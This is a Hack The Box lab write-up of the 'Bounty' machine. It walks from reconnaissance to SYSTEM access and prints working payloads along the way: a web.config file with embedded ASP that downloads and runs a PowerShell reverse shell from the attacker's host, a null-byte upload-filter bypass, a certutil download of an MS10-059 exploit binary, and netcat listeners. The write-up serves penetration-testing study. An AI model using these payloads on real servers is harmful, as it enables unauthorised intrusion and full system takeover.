HTB - Bounty

Getting Root

The box only had port 80 running which had an application that allows to upload files while preventing asp, aspx and few other file extensions.
I was bale to bypass the upload filter using a null byte %00.jpg but the application generated an error giving a clue about something related to web.config.
After some research about web.config, I was able to find an article describing how to upload a web.config file with ASP code embedded and I was able to get a shell.
For privilege escalation, I was able to get system using MS10-059

Tools used:

nmap, nikto, gobuster, nishang, windows-exploit-suggester.py

Nmap

# Nmap 7.80 scan initiated Sun Mar  8 22:08:29 2020 as: nmap -Pn -sC -sV -p 80 -oN nmap/Bounty_nmap.txt 10.10.10.93  
Nmap scan report for 10.10.10.93
Host is up (0.040s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar  8 22:08:50 2020 -- 1 IP address (1 host up) scanned in 21.20 seconds
# Nmap 7.80 scan initiated Sun Mar  8 22:08:50 2020 as: nmap -Pn -sU -oN nmap/Bounty.udp 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up.
All 1000 scanned ports on 10.10.10.93 are open|filtered

# Nmap done at Sun Mar  8 22:12:12 2020 -- 1 IP address (1 host up) scanned in 201.34 seconds

Enumerating HTTP

Port 80 just shows a picture. I saved the picture as merling.jpg and used strings, steghide and exiftool but didn't find anything.

Nikto

Nothing much was found with Nikto

nikto -host http://10.10.10.93
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.93
+ Target Hostname:    10.10.10.93
+ Target Port:        80
+ Start Time:         2020-03-08 22:18:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type  
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2020-03-08 22:24:28 (GMT-4) (344 seconds)
---------------------------------------------------------------------------

Gobuster

gobuster dir -u http://10.10.10.93 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster/Bounty_gobuster.txt -t 40 -x asp,aspx,html,txt   
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.93
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     asp,aspx,html,txt
[+] Timeout:        10s
===============================================================
2020/03/08 22:24:47 Starting gobuster
===============================================================
/transfer.aspx (Status: 200)
/UploadedFiles (Status: 301)
/uploadedFiles (Status: 301)
/uploadedfiles (Status: 301)
===============================================================
2020/03/08 22:44:08 Finished
===============================================================

Testing transfer.aspx

I tried uploading a file with ASP, ASPX and it failed. But when I uploaded the merling.jpg file it worked. Based on that, I used Burp proxy to intercept the request and used a null byte %00 to attempt to bypass the upload filter.

When I tried to execute the shellie.aspx file http://10.10.10.93/UploadedFiles/shellie.aspx I got the following error below.

I have no idea what to do from here, so I googled "IIS 7.5 web.config exploit" and to my surprise, I found the following link stating that we can actually upload a *.config file with asp code and it would work.

Here is the link:

https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/poc-server.com

Explanation of web.config as quoted from the link above:

Web.config
What is a web.config file?
A web.config file lets you customize the way your site or a specific directory on your site behaves. For example, if you place a web.config file in your root directory, it will affect your entire site. If you place it in a /content directory, it will only affect that directory.
With a web.config file, you can control:
Database connection strings.
Error behavior.
Security.
web.config files are XML documents. ‘.config’ is not an extension like ‘.html’ or ‘.txt’.

Getting a Reverse Shell

The link I found on google, refers to the following link below for the code they used in order to get RCE.

Soroush Dalili | A web application security ninja 🥷soroush.secproject.com

I used the example code I found but with a few modifications:

# cat web.config 
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
   <appSettings>
</appSettings>
</configuration>
<!–-
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("ping 10.10.14.3")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-–>

Uploading the web.config file

I can also confirm using tcpdump:

# tcpdump -nni tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
23:58:28.277292 IP 10.10.10.93 > 10.10.14.3: ICMP echo request, id 1, seq 1, length 40  
23:58:28.277378 IP 10.10.14.3 > 10.10.10.93: ICMP echo reply, id 1, seq 1, length 40
23:58:29.271690 IP 10.10.10.93 > 10.10.14.3: ICMP echo request, id 1, seq 2, length 40
23:58:29.271752 IP 10.10.14.3 > 10.10.10.93: ICMP echo reply, id 1, seq 2, length 40
23:58:30.270135 IP 10.10.10.93 > 10.10.14.3: ICMP echo request, id 1, seq 3, length 40
23:58:30.270165 IP 10.10.14.3 > 10.10.10.93: ICMP echo reply, id 1, seq 3, length 40
23:58:31.268337 IP 10.10.10.93 > 10.10.14.3: ICMP echo request, id 1, seq 4, length 40
23:58:31.268366 IP 10.10.14.3 > 10.10.10.93: ICMP echo reply, id 1, seq 4, length 40
^C
8 packets captured
8 packets received by filter
0 packets dropped by kernel

I used nishang reverse powershell script and modified the web.config code as follows:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />  
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
   <appSettings>
</appSettings>
</configuration>
<!–-
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd.exe /c powershell.exe -c iex(New-Object Net.WebClient).DownloadString('http://10.10.14.3/pwsh.ps1')")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-–>

Uploaded the new web.config file
Executed it via http://10.10.10.93/UploadedFiles/web.config
Started the listener on port 8008 ( I edited on the nishang reverse tcp script)
Got a shell as merlin

Started python http server

# To server the nishang revser powershell script
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.93 - - [09/Mar/2020 00:21:47] "GET /pwsh.ps1 HTTP/1.1" 200 -

# Listenner to capture the shell
# rlwrap nc -lnvp 8008
listening on [any] 8008 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49158
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>whoami
bounty\merlin

PS C:\users\merlin\desktop> systeminfo

Host Name:                 BOUNTY
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-402-3606965-84760
Original Install Date:     5/30/2018, 12:22:24 AM
System Boot Time:          3/9/2020, 5:22:56 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,586 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,594 MB
Virtual Memory: In Use:    501 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.93

Privilege Escalation

I used the windows exploit suggester

./windows-exploit-suggester.py -d 2020-03-06-mssb.xls -i sysinfo_bounty 
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical

I used MS10-059. A google search on MS10-059 github takes you to the following link with an exe executable

windows-kernel-exploits/MS10-059 at master · SecWiki/windows-kernel-exploitsGitHub

Download the executable to the target using certutil

PS C:\users\merlin\documents> certutil -urlcache -f -split http://10.10.14.3/MS10-059.exe

Executing the exploit

PS C:\users\merlin\documents> .\MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->
Usage: Chimichurri.exe ipaddress port <BR>

Started a Listener

rlwrap nc -lnvp 9002
listening on [any] 9002 ...

Got Reverse Shell as SYSTEM

# On the target box
PS C:\users\merlin\documents> .\MS10-059.exe 10.10.14.3 9002


# On my Kali box
rlwrap nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49181
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\users\merlin\documents>whoami
whoami
nt authority\system

C:\users\merlin\documents>

PreviousHTB - Artic NextHTB - Jerry

Last updated 5 years ago

hashtagGetting Root

hashtagTools used:

hashtagNmap

hashtagEnumerating HTTP

hashtagNikto

hashtagGobuster

hashtagTesting transfer.aspx

hashtagHere is the link:

hashtagGetting a Reverse Shell

hashtagUploading the web.config file

hashtagI can also confirm using tcpdump:

hashtagPrivilege Escalation

hashtagDownload the executable to the target using certutil

hashtagExecuting the exploit

hashtagStarted a Listener

hashtagGot Reverse Shell as SYSTEM